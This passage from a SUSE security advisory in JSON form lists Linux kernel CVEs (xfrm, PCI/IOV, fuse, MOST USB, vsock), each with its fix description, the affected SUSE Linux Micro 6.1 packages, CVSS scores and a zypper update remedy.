"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: delete x-\u003etunnel as we delete x\n\nThe ipcomp fallback tunnels currently get deleted (from the various\nlists and hashtables) as the last user state that needed that fallback\nis destroyed (not deleted). If a reference to that user state still\nexists, the fallback state will remain on the hashtables/lists,\ntriggering the WARN in xfrm_state_fini. Because of those remaining\nreferences, the fix in commit f75a2804da39 (\"xfrm: destroy xfrm_state\nsynchronously on net exit path\") is not complete.\n\nWe recently fixed one such situation in TCP due to defered freeing of\nskbs (commit 9b6412e6979f (\"tcp: drop secpath at the same time as we\ncurrently drop dst\")). This can also happen due to IP reassembly: skbs\nwith a secpath remain on the reassembly queue until netns\ndestruction. If we can\u0027t guarantee that the queues are flushed by the\ntime xfrm_state_fini runs, there may still be references to a (user)\nxfrm_state, preventing the timely deletion of the corresponding\nfallback state.\n\nInstead of chasing each instance of skbs holding a secpath one by one,\nthis patch fixes the issue directly within xfrm, by deleting the\nfallback state as soon as the last user state depending on it has been\ndeleted. Destruction will still happen when the final reference is\ndropped.\n\nA separate lockdep class for the fallback state is required since\nwe\u0027re going to lock x-\u003etunnel while x is locked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40215",
"url": "https://www.suse.com/security/cve/CVE-2025-40215"
},
{
"category": "external",
"summary": "SUSE Bug 1254959 for CVE-2025-40215",
"url": "https://bugzilla.suse.com/1254959"
},
{
"category": "external",
"summary": "SUSE Bug 1255054 for CVE-2025-40215",
"url": "https://bugzilla.suse.com/1255054"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40215"
},
{
"cve": "CVE-2025-40219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40219"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV\n\nBefore disabling SR-IOV via config space accesses to the parent PF,\nsriov_disable() first removes the PCI devices representing the VFs.\n\nSince commit 9d16947b7583 (\"PCI: Add global pci_lock_rescan_remove()\")\nsuch removal operations are serialized against concurrent remove and\nrescan using the pci_rescan_remove_lock. No such locking was ever added\nin sriov_disable() however. In particular when commit 18f9e9d150fc\n(\"PCI/IOV: Factor out sriov_add_vfs()\") factored out the PCI device\nremoval into sriov_del_vfs() there was still no locking around the\npci_iov_remove_virtfn() calls.\n\nOn s390 the lack of serialization in sriov_disable() may cause double\nremove and list corruption with the below (amended) trace being observed:\n\n PSW: 0704c00180000000 0000000c914e4b38 (klist_put+56)\n GPRS: 000003800313fb48 0000000000000000 0000000100000001 0000000000000001\n\t00000000f9b520a8 0000000000000000 0000000000002fbd 00000000f4cc9480\n\t0000000000000001 0000000000000000 0000000000000000 0000000180692828\n\t00000000818e8000 000003800313fe2c 000003800313fb20 000003800313fad8\n #0 [3800313fb20] device_del at c9158ad5c\n #1 [3800313fb88] pci_remove_bus_device at c915105ba\n #2 [3800313fbd0] pci_iov_remove_virtfn at c9152f198\n #3 [3800313fc28] zpci_iov_remove_virtfn at c90fb67c0\n #4 [3800313fc60] zpci_bus_remove_device at c90fb6104\n #5 [3800313fca0] __zpci_event_availability at c90fb3dca\n #6 [3800313fd08] chsc_process_sei_nt0 at c918fe4a2\n #7 [3800313fd60] crw_collect_info at c91905822\n #8 [3800313fe10] kthread at c90feb390\n #9 [3800313fe68] __ret_from_fork at c90f6aa64\n #10 [3800313fe98] ret_from_fork at c9194f3f2.\n\nThis is because in addition to sriov_disable() removing the VFs, the\nplatform also generates hot-unplug events for the VFs. This being the\nreverse operation to the hotplug events generated by sriov_enable() and\nhandled via pdev-\u003eno_vf_scan. And while the event processing takes\npci_rescan_remove_lock and checks whether the struct pci_dev still exists,\nthe lack of synchronization makes this checking racy.\n\nOther races may also be possible of course though given that this lack of\nlocking persisted so long observable races seem very rare. Even on s390 the\nlist corruption was only observed with certain devices since the platform\nevents are only triggered by config accesses after the removal, so as long\nas the removal finished synchronously they would not race. Either way the\nlocking is missing so fix this by adding it to the sriov_del_vfs() helper.\n\nJust like PCI rescan-remove, locking is also missing in sriov_add_vfs()\nincluding for the error case where pci_stop_and_remove_bus_device() is\ncalled without the PCI rescan-remove lock being held. Even in the non-error\ncase, adding new PCI devices and buses should be serialized via the PCI\nrescan-remove lock. Add the necessary locking.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40219",
"url": "https://www.suse.com/security/cve/CVE-2025-40219"
},
{
"category": "external",
"summary": "SUSE Bug 1254518 for CVE-2025-40219",
"url": "https://bugzilla.suse.com/1254518"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40219"
},
{
"cve": "CVE-2025-40220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40220"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfuse: fix livelock in synchronous file put from fuseblk workers\n\nI observed a hang when running generic/323 against a fuseblk server.\nThis test opens a file, initiates a lot of AIO writes to that file\ndescriptor, and closes the file descriptor before the writes complete.\nUnsurprisingly, the AIO exerciser threads are mostly stuck waiting for\nresponses from the fuseblk server:\n\n# cat /proc/372265/task/372313/stack\n[\u003c0\u003e] request_wait_answer+0x1fe/0x2a0 [fuse]\n[\u003c0\u003e] __fuse_simple_request+0xd3/0x2b0 [fuse]\n[\u003c0\u003e] fuse_do_getattr+0xfc/0x1f0 [fuse]\n[\u003c0\u003e] fuse_file_read_iter+0xbe/0x1c0 [fuse]\n[\u003c0\u003e] aio_read+0x130/0x1e0\n[\u003c0\u003e] io_submit_one+0x542/0x860\n[\u003c0\u003e] __x64_sys_io_submit+0x98/0x1a0\n[\u003c0\u003e] do_syscall_64+0x37/0xf0\n[\u003c0\u003e] entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nBut the /weird/ part is that the fuseblk server threads are waiting for\nresponses from itself:\n\n# cat /proc/372210/task/372232/stack\n[\u003c0\u003e] request_wait_answer+0x1fe/0x2a0 [fuse]\n[\u003c0\u003e] __fuse_simple_request+0xd3/0x2b0 [fuse]\n[\u003c0\u003e] fuse_file_put+0x9a/0xd0 [fuse]\n[\u003c0\u003e] fuse_release+0x36/0x50 [fuse]\n[\u003c0\u003e] __fput+0xec/0x2b0\n[\u003c0\u003e] task_work_run+0x55/0x90\n[\u003c0\u003e] syscall_exit_to_user_mode+0xe9/0x100\n[\u003c0\u003e] do_syscall_64+0x43/0xf0\n[\u003c0\u003e] entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nThe fuseblk server is fuse2fs so there\u0027s nothing all that exciting in\nthe server itself. So why is the fuse server calling fuse_file_put?\nThe commit message for the fstest sheds some light on that:\n\n\"By closing the file descriptor before calling io_destroy, you pretty\nmuch guarantee that the last put on the ioctx will be done in interrupt\ncontext (during I/O completion).\n\nAha. AIO fgets a new struct file from the fd when it queues the ioctx.\nThe completion of the FUSE_WRITE command from userspace causes the fuse\nserver to call the AIO completion function. The completion puts the\nstruct file, queuing a delayed fput to the fuse server task. When the\nfuse server task returns to userspace, it has to run the delayed fput,\nwhich in the case of a fuseblk server, it does synchronously.\n\nSending the FUSE_RELEASE command sychronously from fuse server threads\nis a bad idea because a client program can initiate enough simultaneous\nAIOs such that all the fuse server threads end up in delayed_fput, and\nnow there aren\u0027t any threads left to handle the queued fuse commands.\n\nFix this by only using asynchronous fputs when closing files, and leave\na comment explaining why.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40220",
"url": "https://www.suse.com/security/cve/CVE-2025-40220"
},
{
"category": "external",
"summary": "SUSE Bug 1254520 for CVE-2025-40220",
"url": "https://bugzilla.suse.com/1254520"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40220"
},
{
"cve": "CVE-2025-40223",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40223"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: usb: Fix use-after-free in hdm_disconnect\n\nhdm_disconnect() calls most_deregister_interface(), which eventually\nunregisters the MOST interface device with device_unregister(iface-\u003edev).\nIf that drops the last reference, the device core may call release_mdev()\nimmediately while hdm_disconnect() is still executing.\n\nThe old code also freed several mdev-owned allocations in\nhdm_disconnect() and then performed additional put_device() calls.\nDepending on refcount order, this could lead to use-after-free or\ndouble-free when release_mdev() ran (or when unregister paths also\nperformed puts).\n\nFix by moving the frees of mdev-owned allocations into release_mdev(),\nso they happen exactly once when the device is truly released, and by\ndropping the extra put_device() calls in hdm_disconnect() that are\nredundant after device_unregister() and most_deregister_interface().\n\nThis addresses the KASAN slab-use-after-free reported by syzbot in\nhdm_disconnect(). See report and stack traces in the bug link below.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40223",
"url": "https://www.suse.com/security/cve/CVE-2025-40223"
},
{
"category": "external",
"summary": "SUSE Bug 1254957 for CVE-2025-40223",
"url": "https://bugzilla.suse.com/1254957"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40223"
},
{
"cve": "CVE-2025-40231",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40231"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock: fix lock inversion in vsock_assign_transport()\n\nSyzbot reported a potential lock inversion deadlock between\nvsock_register_mutex and sk_lock-AF_VSOCK when vsock_linger() is called.\n\nThe issue was introduced by commit 687aa0c5581b (\"vsock: Fix\ntransport_* TOCTOU\") which added vsock_register_mutex locking in\nvsock_assign_transport() around the transport-\u003erelease() call, that can\ncall vsock_linger(). vsock_assign_transport() can be called with sk_lock\nheld. vsock_linger() calls sk_wait_event() that temporarily releases and\nre-acquires sk_lock. During this window, if another thread hold\nvsock_register_mutex while trying to acquire sk_lock, a circular\ndependency is created.\n\nFix this by releasing vsock_register_mutex before calling\ntransport-\u003erelease() and vsock_deassign_transport(). This is safe\nbecause we don\u0027t need to hold vsock_register_mutex while releasing the\nold transport, and we ensure the new transport won\u0027t disappear by\nobtaining a module reference first via try_module_get().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
